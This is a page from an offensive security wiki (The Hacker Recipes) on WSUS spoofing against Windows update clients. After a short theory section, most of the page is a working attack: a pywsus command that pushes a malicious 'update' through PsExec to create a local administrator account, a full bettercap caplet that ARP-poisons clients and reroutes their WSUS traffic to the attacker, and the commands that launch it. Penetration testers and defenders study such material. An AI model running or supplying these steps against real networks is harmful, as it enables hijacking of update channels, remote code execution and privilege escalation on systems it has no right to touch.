The Hacker Recipes
GitHubTwitterDonate
Search…
Introduction
Active Directory
Reconnaissance
Movement
Credentials
MITM and coerced auths
ARP poisoning
DNS spoofing
DHCP poisoning
DHCPv6 spoofing
WSUS spoofing
LLMNR, NBT-NS, mDNS spoofing
ADIDNS poisoning
WPAD spoofing
MS-EFSR abuse (PetitPotam)
MS-RPRN abuse (PrinterBug)
MS-FSRVP abuse (ShadowCoerce)
PushSubscription abuse
WebClient abuse (WebDAV)
🛠️ NBT Name Overwrite
🛠️ ICMP Redirect
🛠️ Living off the land
NTLM
Kerberos
Access controls
Group policies
Built-in groups
Domain settings
🛠️ Trusts
Netlogon
Certificate Services (AD-CS)
Exchange services
Print Spooler Service
Persistence
Web services
Reconnaissance
Configuration
Accounts and sessions
User inputs
Systems & services
Reconnaissance
Movement
Privilege escalation
Pivoting
🛠️ Physical
Locks
Networking
Machines
Super secret zones
🛠️ Intelligence gathering
CYBINT
OSINT
GEOINT
🛠️ RADIO
RFID
Bluetooth
Wi-Fi
Wireless keyboard/mouse
🛠️ binary exploitation
Use-after-free
Buffer overflow
🛠️ mobile apps
Android
iOS
Powered By GitBook
WSUS spoofing

Theory

WSUS (Windows Server Update Services) allow administrators to centralize the management and deployment of Windows updates within their organization network. When first configuring this set of services, the default configuration makes the WSUS use HTTP without any secure layer like SSL/TLS. HTTPS is not enforced by default.
When pulling an update from the WSUS server, clients are redirected to the executable file to download and execute (which can only be a binary signed by Microsoft) and obtain a handler named CommandLineInstallation that specifies the additional parameters to pass the binary during the update installation. Without HTTPS, the WSUS is vulnerable to Man-in-the-Middle attacks where adversaries can either pose as the update server and send malicious updates or intercept and modify updates sent to the clients.

Practice

The following command prints the WSUS server the client requests when searching for an update. If the path looks like http://wsus.domain.local/, showing the use of HTTP instead of HTTPS, the attacks can be attempted.
1
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v wuserver
Copied!
The WSUS spoofing attack can be conducted as follows
  1. 1.
    Obtain a Man-in-the-Middle position between clients and the update server with ARP poisoning.
  2. 2.
    Redirect traffic from clients -> legitimate WSUS to clients -> attacker's WSUS
  3. 3.
    Have a custom WSUS server running able to send evil updates to clients
In a scenario where the clients and the attacker are on the same subnet, and the update server is on another one, the steps below can be followed. For other scenarios or more info on ARP poisoning, a recipe exists for it.

Preparing the evil WSUS

The evil WSUS server needs to be started before doing any ARP poisoning. The pywsus (Python) utility can be used for that matter.
1
python3 pywsus.py --host $network_facing_ip --port 8530 --executable /path/to/PsExec64.exe --command '/accepteula /s cmd.exe /c "net user testuser somepassword /add && net localgroup Administrators testuser /add"'
Copied!
Programs other than PsExec.exe can be used here. Using built-in programs features to bypass security restrictions or operate attacks like this is called Living off the land (LOL). Other Windows LOL binaries and scripts (a.k.a. LOLbins or LOLbas) can be found on lolbas-project.github.io.

Poisoning and hijacking

Once the WSUS server is up and running, the ARP poisoning attack can start. The best tool to operate ARP poisoning is bettercap (Go) and for the majority of the scenarios, basic knowledge of the iptables utility is required.
Packets from the client to the WSUS server need to be hijacked and sent to the attacker's evil WSUS server. In order to do so, the attacker must pose as the client's gateway, route all traffic to the real gateway except the packets destined to the WSUS server.
wsus_spoofing.cap
1
# quick recon of the network
2
net.probe on
3
4
# set the ARP spoofing
5
set arp.spoof.targets $client_ip
6
set arp.spoof.internal false
7
set arp.spoof.fullduplex false
8
9
# reroute traffic aimed at the WSUS server
10
set any.proxy.iface $interface
11
set any.proxy.protocol TCP
12
set any.proxy.src_address $WSUS_server_ip
13
set any.proxy.src_port 8530
14
set any.proxy.dst_address $attacker_ip
15
set any.proxy.dst_port 8530
16
17
# control logging and verbosity
18
events.ignore endpoint
19
events.ignore net.sniff
20
21
# start the modules
22
any.proxy on
23
arp.spoof on
24
net.sniff on
Copied!
The caplet above can be loaded with the following command in order to launch the ARP poisoning attack.
1
bettercap --iface $interface --caplet wsus_spoofing.cap
Copied!

Triggering Windows update

The search for Windows updates can be manually triggered when having access to the target computer by going to Settings > Update & Security > Windows Update > Check for updates.
By default, the automatic updates interval is 22 hours (source).

Alternative attack

Another way of attacking insecure WSUS without having to rely on ARP poisoning but requiring user access to the target machine is explained in the following blogpost : WSUS Attacks Part 2: CVE-2020-1013 a Windows 10 Local Privilege Escalation 1-Day

Resources

WSUS Attacks Part 1: Introducing PyWSUS - GoSecure
GoSecure
Previous
DHCPv6 spoofing
Next
LLMNR, NBT-NS, mDNS spoofing
Last modified 1mo ago
Copy link
Edit on GitHub
Contents
Theory
Practice
Preparing the evil WSUS
Poisoning and hijacking
Triggering Windows update
Alternative attack
Resources